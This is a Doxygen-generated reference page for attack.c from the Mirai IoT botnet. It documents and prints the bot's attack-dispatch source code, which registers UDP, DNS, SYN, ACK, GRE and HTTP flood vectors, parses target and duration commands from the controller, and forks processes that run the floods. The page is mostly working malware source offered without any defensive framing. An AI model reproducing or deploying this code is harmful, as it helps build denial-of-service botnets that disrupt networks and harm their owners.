Mirai: mirai/bot/attack.c File Reference
attack.c File Reference
#include <stdlib.h>
#include <unistd.h>
#include <signal.h>
#include <errno.h>
#include "includes.h"
#include "attack.h"
#include "rand.h"
#include "util.h"
#include "scanner.h"
Macros
#define _GNU_SOURCE
Functions
BOOL attack_init (void)
void attack_kill_all (void)
void attack_parse (char *buf, int len)
void attack_start (int duration, ATTACK_VECTOR vector, uint8_t targs_len, struct attack_target *targs, uint8_t opts_len, struct attack_option *opts)
char * attack_get_opt_str (uint8_t opts_len, struct attack_option *opts, uint8_t opt, char *def)
int attack_get_opt_int (uint8_t opts_len, struct attack_option *opts, uint8_t opt, int def)
uint32_t attack_get_opt_ip (uint8_t opts_len, struct attack_option *opts, uint8_t opt, uint32_t def)
static void add_attack (ATTACK_VECTOR vector, ATTACK_FUNC func)
static void free_opts (struct attack_option *opts, int len)
Variables
uint8_t methods_len = 0
struct attack_method ** methods = NULL
int attack_ongoing [ATTACK_CONCURRENT_MAX] = {0}
Macro Definition Documentation
#define _GNU_SOURCE
Definition at line 1 of file attack.c.
Function Documentation
static void add_attack (ATTACK_VECTOR vector, ATTACK_FUNC func) static
Definition at line 226 of file attack.c.
References attack_method::func, methods_len, and attack_method::vector.
Referenced by attack_init().
 {
     struct attack_method *method = calloc(1, sizeof (struct attack_method));
     method->vector = vector;
     method->func = func;
     methods = realloc(methods, (methods_len + 1) * sizeof (struct attack_method *));
     methods[methods_len++] = method;
 }
int attack_get_opt_int (uint8_t opts_len, struct attack_option * opts, uint8_t opt, int def)
Definition at line 206 of file attack.c.
References attack_get_opt_str(), util_atoi(), and attack_option::val.
Referenced by attack_app_cfnull(), attack_app_http(), attack_gre_eth(), attack_gre_ip(), attack_tcp_ack(), attack_tcp_stomp(), attack_tcp_syn(), attack_udp_dns(), attack_udp_generic(), attack_udp_plain(), and attack_udp_vse().
 {
     char *val = attack_get_opt_str(opts_len, opts, opt, NULL);
     if (val == NULL)
         return def;
     else
         return util_atoi(val, 10);
 }
uint32_t attack_get_opt_ip (uint8_t opts_len, struct attack_option * opts, uint8_t opt, uint32_t def)
Definition at line 216 of file attack.c.
References attack_get_opt_str(), and attack_option::val.
Referenced by attack_tcp_ack(), and attack_tcp_syn().
 {
     char *val = attack_get_opt_str(opts_len, opts, opt, NULL);
     if (val == NULL)
         return def;
     else
         return inet_addr(val);
 }
char* attack_get_opt_str (uint8_t opts_len, struct attack_option * opts, uint8_t opt, char * def)
Definition at line 193 of file attack.c.
References attack_option::key, and attack_option::val.
Referenced by attack_app_cfnull(), attack_app_http(), attack_get_opt_int(), attack_get_opt_ip(), and attack_udp_dns().
 {
     int i;
     for (i = 0; i < opts_len; i++)
     {
         if (opts[i].key == opt)
             return opts[i].val;
     }
     return def;
 }
BOOL attack_init (void)
Definition at line 22 of file attack.c.
References add_attack(), ATK_VEC_ACK, ATK_VEC_DNS, ATK_VEC_GREETH, ATK_VEC_GREIP, ATK_VEC_HTTP, ATK_VEC_STOMP, ATK_VEC_SYN, ATK_VEC_UDP, ATK_VEC_UDP_PLAIN, ATK_VEC_VSE, attack_app_http(), attack_gre_eth(), attack_gre_ip(), attack_tcp_ack(), attack_tcp_stomp(), attack_tcp_syn(), attack_udp_dns(), attack_udp_generic(), attack_udp_plain(), attack_udp_vse(), and TRUE.
Referenced by main().
 {
     int i;
     add_attack(ATK_VEC_UDP, (ATTACK_FUNC)attack_udp_generic);
     add_attack(ATK_VEC_VSE, (ATTACK_FUNC)attack_udp_vse);
     add_attack(ATK_VEC_DNS, (ATTACK_FUNC)attack_udp_dns);
     add_attack(ATK_VEC_UDP_PLAIN, (ATTACK_FUNC)attack_udp_plain);
     add_attack(ATK_VEC_SYN, (ATTACK_FUNC)attack_tcp_syn);
     add_attack(ATK_VEC_ACK, (ATTACK_FUNC)attack_tcp_ack);
     add_attack(ATK_VEC_STOMP, (ATTACK_FUNC)attack_tcp_stomp);
     add_attack(ATK_VEC_GREIP, (ATTACK_FUNC)attack_gre_ip);
     add_attack(ATK_VEC_GREETH, (ATTACK_FUNC)attack_gre_eth);
     //add_attack(ATK_VEC_PROXY, (ATTACK_FUNC)attack_app_proxy);
     add_attack(ATK_VEC_HTTP, (ATTACK_FUNC)attack_app_http);
     return TRUE;
 }
void attack_kill_all (void)
Definition at line 44 of file attack.c.
References ATTACK_CONCURRENT_MAX, attack_ongoing, and scanner_init().
Referenced by main().
 {
     int i;
 #ifdef DEBUG
     printf("[attack] Killing all ongoing attacks\n");
 #endif
     for (i = 0; i < ATTACK_CONCURRENT_MAX; i++)
     {
         if (attack_ongoing[i] != 0)
             kill(attack_ongoing[i], 9);
         attack_ongoing[i] = 0;
     }
 #ifdef MIRAI_TELNET
     scanner_init();
 #endif
 }
void attack_parse (char * buf, int len)
Definition at line 64 of file attack.c.
References attack_target::addr, attack_start(), free, free_opts(), attack_option::key, attack_target::netmask, attack_target::sock_addr, util_memcpy(), attack_option::val, and attack_method::vector.
Referenced by main().
 {
     int i;
     uint32_t duration;
     ATTACK_VECTOR vector;
     uint8_t targs_len, opts_len;
     struct attack_target *targs = NULL;
     struct attack_option *opts = NULL;
     // Read in attack duration uint32_t
     if (len < sizeof (uint32_t))
         goto cleanup;
     duration = ntohl(*((uint32_t *)buf));
     buf += sizeof (uint32_t);
     len -= sizeof (uint32_t);
     // Read in attack ID uint8_t
     if (len == 0)
         goto cleanup;
     vector = (ATTACK_VECTOR)*buf++;
     len -= sizeof (uint8_t);
     // Read in target count uint8_t
     if (len == 0)
         goto cleanup;
     targs_len = (uint8_t)*buf++;
     len -= sizeof (uint8_t);
     if (targs_len == 0)
         goto cleanup;
     // Read in all targs
     if (len < ((sizeof (ipv4_t) + sizeof (uint8_t)) * targs_len))
         goto cleanup;
     targs = calloc(targs_len, sizeof (struct attack_target));
     for (i = 0; i < targs_len; i++)
     {
         targs[i].addr = *((ipv4_t *)buf);
         buf += sizeof (ipv4_t);
         targs[i].netmask = (uint8_t)*buf++;
         len -= (sizeof (ipv4_t) + sizeof (uint8_t));
         targs[i].sock_addr.sin_family = AF_INET;
         targs[i].sock_addr.sin_addr.s_addr = targs[i].addr;
     }
     // Read in flag count uint8_t
     if (len < sizeof (uint8_t))
         goto cleanup;
     opts_len = (uint8_t)*buf++;
     len -= sizeof (uint8_t);
     // Read in all opts
     if (opts_len > 0)
     {
         opts = calloc(opts_len, sizeof (struct attack_option));
         for (i = 0; i < opts_len; i++)
         {
             uint8_t val_len;
             // Read in key uint8
             if (len < sizeof (uint8_t))
                 goto cleanup;
             opts[i].key = (uint8_t)*buf++;
             len -= sizeof (uint8_t);
             // Read in data length uint8
             if (len < sizeof (uint8_t))
                 goto cleanup;
             val_len = (uint8_t)*buf++;
             len -= sizeof (uint8_t);
             if (len < val_len)
                 goto cleanup;
             opts[i].val = calloc(val_len + 1, sizeof (char));
             util_memcpy(opts[i].val, buf, val_len);
             buf += val_len;
             len -= val_len;
         }
     }
     errno = 0;
     attack_start(duration, vector, targs_len, targs, opts_len, opts);
     // Cleanup
     cleanup:
     if (targs != NULL)
         free(targs);
     if (opts != NULL)
         free_opts(opts, opts_len);
 }
void attack_start (int duration, ATTACK_VECTOR vector, uint8_t targs_len, struct attack_target * targs, uint8_t opts_len, struct attack_option * opts)
Definition at line 155 of file attack.c.
References attack_method::func, and methods_len.
Referenced by attack_parse().
 {
     int pid1, pid2;
     pid1 = fork();
     if (pid1 == -1 || pid1 > 0)
         return;
     pid2 = fork();
     if (pid2 == -1)
         exit(0);
     else if (pid2 == 0)
     {
         sleep(duration);
         kill(getppid(), 9);
         exit(0);
     }
     else
     {
         int i;
         for (i = 0; i < methods_len; i++)
         {
             if (methods[i]->vector == vector)
             {
 #ifdef DEBUG
                 printf("[attack] Starting attack...\n");
 #endif
                 methods[i]->func(targs_len, targs, opts_len, opts);
                 break;
             }
         }
         //just bail if the function returns
         exit(0);
     }
 }
static void free_opts (struct attack_option * opts, int len) static
Definition at line 237 of file attack.c.
References free.
Referenced by attack_parse().
 {
     int i;
     if (opts == NULL)
         return;
     for (i = 0; i < len; i++)
     {
         if (opts[i].val != NULL)
             free(opts[i].val);
     }
     free(opts);
 }
Variable Documentation
int attack_ongoing[ATTACK_CONCURRENT_MAX] = {0}
Definition at line 20 of file attack.c.
Referenced by attack_kill_all().
struct attack_method** methods = NULL
Definition at line 19 of file attack.c.
uint8_t methods_len = 0
Definition at line 18 of file attack.c.
Referenced by add_attack(), and attack_start().